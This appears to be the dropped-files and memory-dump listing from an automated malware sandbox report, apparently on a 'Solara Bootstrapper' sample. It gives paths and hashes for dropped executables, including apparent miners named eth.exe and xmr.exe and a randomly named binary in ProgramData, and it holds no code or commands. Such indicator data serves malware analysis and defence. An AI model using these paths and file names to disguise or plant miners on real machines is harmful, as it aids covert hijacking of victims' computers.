C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
7fec3a0b5a7310d98fe0ece82a076017

SHA1
23cd9f3cbef3e09039ab19eb09ba71c0b1f62195

SHA256
78ff61d3c809fa9f8ba08ed605b791c85802e939ccd4ffc56ade88fb69aff3e9

SHA512
7af0eee7f4b0d3b6c9156671faaaf8c53e749adb0135085b54f9b5569a35c3e66e52341cd21304c9e8537838c53811123ca5f04f6c9a5c370e8bf732aae64022

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PMPP5D70MWSACJEPVOYJ.temp

Filesize
7KB

MD5
815f4f02ae45e580fc4880e0610d094e

SHA1
258dce0af929c530cfe3208cc3cfa8eea4b34856

SHA256
efb2cfe389ce0b6f1f8dbe61e01cc0e04eb5786267ea6d685e65e32bb8066cda

SHA512
51bba88932e82ee1b558d52f6ae831c67e4ae71e23c3754fc41a696fec52b141cfb7ced38a18ce0d9a1bba7bee66c0b15e2aeba0cfbddfa388e71fb9dc25e83a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
997bd4e65eb35723ee2e9b9ca2bf63d2

SHA1
c8d63a261283b33f07950c7d3f01860a379c718f

SHA256
acb355d3942b2c7aab72dfbd9cb93d728dae516ff36bc50bf4e855c4ef1f7fdf

SHA512
2838cd71bd065ceb22abfae9355a6626a0756878b3a34e705fc661394dbe699c26b73f3a664ca3f77db18bd181d43e8dd8c66536838b35ffaf2536ee1864a590

Download Submit
\ProgramData\wwuujrlkomwy\eejhedztifcv.exe

Filesize
3.1MB

MD5
38dee6422cef26bd1e1e751404e4402c

SHA1
52a8a3b3cad69a21bb3d5eed2b7bdaeda3dd8f58

SHA256
37d35b4dd7dd2a338ebabcf92c87bf336b0220a3b3832e3068a1d16587f75e3e

SHA512
3b2624141aeb87e33a645ad505697353656c8e040587a355f800de6d765dd7f8f0a8c2a352de335fc75d3dc7a33d0576581d5585138d9968242c97c47e50c4df

Download Submit
\ProgramData\wwuujrlkomwy\eejhedztifcv.exe

Filesize
3.0MB

MD5
cc003a4175fc13a97b3967b22a5f9a8e

SHA1
de13562d22241c4bb335fdf5a7de4ece1e20ef03

SHA256
d39dc2bb0c05b1060fa1c03c0ad111be20907c64c1a7523668ff7e2c0b0e2d41

SHA512
5264519a107cc2cbc0bdbe99ba0ae96bba9d5480fb484b5b8c4542b8bd64b3204ba669063711d38c087c6752457e668f6d45dfa804512fefd2063f241f8fa65b

Download Submit
\Users\Admin\AppData\Local\Temp\Solara Bootstrapper.exe

Filesize
10.5MB

MD5
00a1864355a5ea47902e5757c0d87fd9

SHA1
4be5647308e0925fb00fae068cb4a89a8a449afc

SHA256
4289002fd7528974ae7a9bf4d855bfd3812d248a46dbd7f94e7336f260ae7a39

SHA512
7f86e42676cfd77aafd7a030656ad88d041ba54edc6eab41193528b03e79850f89e7d79679e6a14fff8e69d7011e36e03d09c73a46e8fc722dc126c3da4be718

Download Submit
\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

Filesize
13KB

MD5
6557bd5240397f026e675afb78544a26

SHA1
839e683bf68703d373b6eac246f19386bb181713

SHA256
a7fecfc225dfdd4e14dcd4d1b4ba1b9f8e4d1984f1cdd8cda3a9987e5d53c239

SHA512
f2399d34898a4c0c201372d2dd084ee66a66a1c3eae949e568421fe7edada697468ef81f4fcab2afd61eaf97bcb98d6ade2d97295e2f674e93116d142e892e97

Download Submit
\Users\Admin\AppData\Local\Temp\eth.exe

Filesize
5.2MB

MD5
87c3dd67bfa3009d89f7b45b01d705b8

SHA1
7eb74405565dd5971298b2a2c8de9116d08db2d5

SHA256
92722d28951672263b79cd30eb975d770cfd5bd5ff53344fd329546fb950f155

SHA512
c79f10712bb505d3645c9fdf8ef11bd787ab327fc2f176302de71b5d4a886026e46e40338a5db964e4b42bd152f3279fda8f2f842f99876bee1b0783d2f74e0e

Download Submit
\Users\Admin\AppData\Local\Temp\xmr.exe

Filesize
5.2MB

MD5
154202154e41175e801a698ca940eb0c

SHA1
6ce074d67c91cb00016cb1095319b00afab396a8

SHA256
0612bfb5a51b0b413ba960f7d52bc647bd4cf7530fd760c0d6006aa829e806e2

SHA512
7d0a7474c28b87972fb02a48ee56a2549765a584a53abbd123631e142a655b17f3508b7d3c2b90f3174d118940143af12728355900472f27fe8280aa11a8f540

Download Submit
memory/412-84-0x0000000000760000-0x0000000000784000-memory.dmp

Filesize
144KB

Download
memory/412-87-0x0000000037820000-0x0000000037830000-memory.dmp

Filesize
64KB

Download
memory/412-82-0x0000000000760000-0x0000000000784000-memory.dmp

Filesize
144KB

Download
memory/412-85-0x0000000000790000-0x00000000007BB000-memory.dmp

Filesize
172KB

Download
memory/412-86-0x000007FEBE090000-0x000007FEBE0A0000-memory.dmp

Filesize
64KB

Download
memory/464-92-0x0000000000200000-0x000000000022B000-memory.dmp

Filesize
172KB

Download
memory/480-96-0x0000000000990000-0x00000000009BB000-memory.dmp

Filesize
172KB

Download
memory/480-97-0x000007FEBE090000-0x000007FEBE0A0000-memory.dmp

Filesize
64KB

Download
memory/480-98-0x0000000037820000-0x0000000037830000-memory.dmp

Filesize
64KB

Download
memory/1912-351-0x0000000000AB0000-0x0000000000AB8000-memory.dmp

Filesize
32KB

Download
memory/1912-350-0x0000000019D30000-0x000000001A012000-memory.dmp

Filesize
2.9MB

Download
memory/2236-52-0x0000000000B10000-0x0000000000B1A000-memory.dmp

Filesize
40KB

Download
memory/2384-69-0x000000001B0C0000-0x000000001B3A2000-memory.dmp

Filesize
2.9MB

Download
memory/2384-70-0x00000000022D0000-0x00000000022D8000-memory.dmp

Filesize
32KB

Download
memory/2440-77-0x00000000777E0000-0x0000000077989000-memory.dmp

Filesize
1.7MB

Download
memory/2440-78-0x00000000776C0000-0x00000000777DF000-memory.dmp

Filesize
1.1MB

Download
memory/2440-79-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2440-71-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2440-74-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2440-76-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2440-72-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2440-73-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download